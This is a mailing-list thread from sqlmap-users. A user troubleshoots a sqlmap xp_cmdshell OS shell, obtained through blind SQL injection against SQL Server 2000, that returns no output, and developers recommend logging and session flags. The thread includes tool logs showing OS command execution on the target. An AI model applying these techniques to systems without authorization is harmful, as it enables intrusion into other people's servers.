Thread: [sqlmap-users] OS Shell
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: Chris O. <chr...@gm...> - 2011-12-21 14:56:59
|
Hi All I have a time based blind injection on a machine running Windows Server 2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should be able to enable xp_cmdshell, and indeed: [13:10:12] [INFO] testing if current user is DBA [13:10:12] [INFO] retrieved: 1 [13:10:29] [INFO] checking if xp_cmdshell extended procedure is available, please wait.. [13:10:40] [INFO] xp_cmdshell extended procedure is available [13:10:41] [INFO] going to use xp_cmdshell extended procedure for operating system command execution [13:10:41] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER os-shell> dir do you want to retrieve the command standard output? [Y/n/a] [13:10:53] [INFO] retrieved: No output os-shell> ipconfig do you want to retrieve the command standard output? [Y/n/a] [13:11:11] [INFO] retrieved: No output os-shell> exit [13:31:24] [INFO] cleaning up the database management system [13:31:26] [INFO] Fetched data logged to text files under... As you can see, no output is returned (is this because of the injection type I wonder?). I've tried the various out of bounds methods with BT and msf too, but this seems to fail at various stages. Could it be that the database server is separate from the web server and is totally isolated from the outside world by egress rules? I'm trying to understand why in this case nothing seems to be working. Any ideas would be great. Regards Chris |
|
From: Miroslav S. <mir...@gm...> - 2011-12-21 15:24:43
|
Hi Chris. Could you please send the traffic file retrieved with -t traffic.txt? Kind regards, Miroslav Stampar Dana 21.12.2011. 15:57 "Chris Oakley" <chr...@gm...> je napisao/la: > Hi All > > I have a time based blind injection on a machine running Windows Server > 2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should be > able to enable xp_cmdshell, and indeed: > > [13:10:12] [INFO] testing if current user is DBA > [13:10:12] [INFO] retrieved: 1 > [13:10:29] [INFO] checking if xp_cmdshell extended procedure is available, > please wait.. > [13:10:40] [INFO] xp_cmdshell extended procedure is available > [13:10:41] [INFO] going to use xp_cmdshell extended procedure for > operating system command execution > [13:10:41] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and > press ENTER > os-shell> dir > do you want to retrieve the command standard output? [Y/n/a] > [13:10:53] [INFO] retrieved: > No output > os-shell> ipconfig > do you want to retrieve the command standard output? [Y/n/a] > [13:11:11] [INFO] retrieved: > No output > os-shell> exit > [13:31:24] [INFO] cleaning up the database management system > [13:31:26] [INFO] Fetched data logged to text files under... > > As you can see, no output is returned (is this because of the injection > type I wonder?). > > I've tried the various out of bounds methods with BT and msf too, but this > seems to fail at various stages. > > Could it be that the database server is separate from the web server and > is totally isolated from the outside world by egress rules? > > I'm trying to understand why in this case nothing seems to be working. > > Any ideas would be great. > > Regards > > Chris > > > ------------------------------------------------------------------------------ > Write once. Port to many. > Get the SDK and tools to simplify cross-platform app development. Create > new or port existing apps to sell to consumers worldwide. Explore the > Intel AppUpSM program developer opportunity. appdeveloper.intel.com/join > http://p.sf.net/sfu/intel-appdev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-12-21 15:31:49
|
Hi Chris, On 21 December 2011 14:56, Chris Oakley <chr...@gm...> wrote: > Hi All > > I have a time based blind injection on a machine running Windows Server > 2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should be > able to enable xp_cmdshell, and indeed: Indeed. > ... > As you can see, no output is returned (is this because of the injection type > I wonder?). No, it has nothing to do with the injection type. SQL payloads used by sqlmap has been written and the core has been engineered in a way that regardless of the technique used, sqlmap is able to retrieve the queries' output. The issue is somewhere else. > I've tried the various out of bounds methods with BT and msf too, but this > seems to fail at various stages. > > Could it be that the database server is separate from the web server and is > totally isolated from the outside world by egress rules? This could be, but it looks to me that you're mixing xp_cmdshell/bug with network rules. I think that the issue here is about xp_cmdshell. Could you please relaunch with -v 3 --parse-errors -t traffic.log and send us (privately if you prefer) the whole output and the log file? Thank you. Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Chris O. <chr...@gm...> - 2011-12-29 17:05:45
|
Thanks for the replies. Yes it'll have to be in private. When I relaunch, do you need me to do it from scratch (as in flush session) or is it ok to just use the traffic logging options with the injection already found? On 21 December 2011 15:31, Bernardo Damele A. G. <ber...@gm...>wrote: > Hi Chris, > > On 21 December 2011 14:56, Chris Oakley <chr...@gm...> > wrote: > > Hi All > > > > I have a time based blind injection on a machine running Windows Server > > 2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should > be > > able to enable xp_cmdshell, and indeed: > > Indeed. > > > ... > > As you can see, no output is returned (is this because of the injection > type > > I wonder?). > > No, it has nothing to do with the injection type. SQL payloads used by > sqlmap has been written and the core has been engineered in a way that > regardless of the technique used, sqlmap is able to retrieve the > queries' output. > The issue is somewhere else. > > > I've tried the various out of bounds methods with BT and msf too, but > this > > seems to fail at various stages. > > > > Could it be that the database server is separate from the web server and > is > > totally isolated from the outside world by egress rules? > > This could be, but it looks to me that you're mixing xp_cmdshell/bug > with network rules. I think that the issue here is about xp_cmdshell. > > Could you please relaunch with -v 3 --parse-errors -t traffic.log and > send us (privately if you prefer) the whole output and the log file? > > Thank you. > Bernardo > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > |
|
From: <and...@gm...> - 2011-12-29 17:22:44
|
Hi Chris, Yes you have to use the flush-session option. Andre -----Original Message----- From: Chris Oakley <chr...@gm...> Date: Thu, 29 Dec 2011 17:05:37 To: Bernardo Damele A. G.<ber...@gm...> Cc: <sql...@li...> Subject: Re: [sqlmap-users] OS Shell ------------------------------------------------------------------------------ Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex infrastructure or vast IT resources to deliver seamless, secure access to virtual desktops. With this all-in-one solution, easily deploy virtual desktops for less than the cost of PCs and save 60% on VDI infrastructure costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-12-29 18:33:56
|
Yes please with --fresh-queries -v3 -t traffic.log. Bernardo Damele A. G. This message was sent from a smartphone On 29 Dec 2011, at 17:05, Chris Oakley <chr...@gm...> wrote: Thanks for the replies. Yes it'll have to be in private. When I relaunch, do you need me to do it from scratch (as in flush session) or is it ok to just use the traffic logging options with the injection already found? On 21 December 2011 15:31, Bernardo Damele A. G. <ber...@gm...>wrote: > Hi Chris, > > On 21 December 2011 14:56, Chris Oakley <chr...@gm...> > wrote: > > Hi All > > > > I have a time based blind injection on a machine running Windows Server > > 2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should > be > > able to enable xp_cmdshell, and indeed: > > Indeed. > > > ... > > As you can see, no output is returned (is this because of the injection > type > > I wonder?). > > No, it has nothing to do with the injection type. SQL payloads used by > sqlmap has been written and the core has been engineered in a way that > regardless of the technique used, sqlmap is able to retrieve the > queries' output. > The issue is somewhere else. > > > I've tried the various out of bounds methods with BT and msf too, but > this > > seems to fail at various stages. > > > > Could it be that the database server is separate from the web server and > is > > totally isolated from the outside world by egress rules? > > This could be, but it looks to me that you're mixing xp_cmdshell/bug > with network rules. I think that the issue here is about xp_cmdshell. > > Could you please relaunch with -v 3 --parse-errors -t traffic.log and > send us (privately if you prefer) the whole output and the log file? > > Thank you. > Bernardo > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X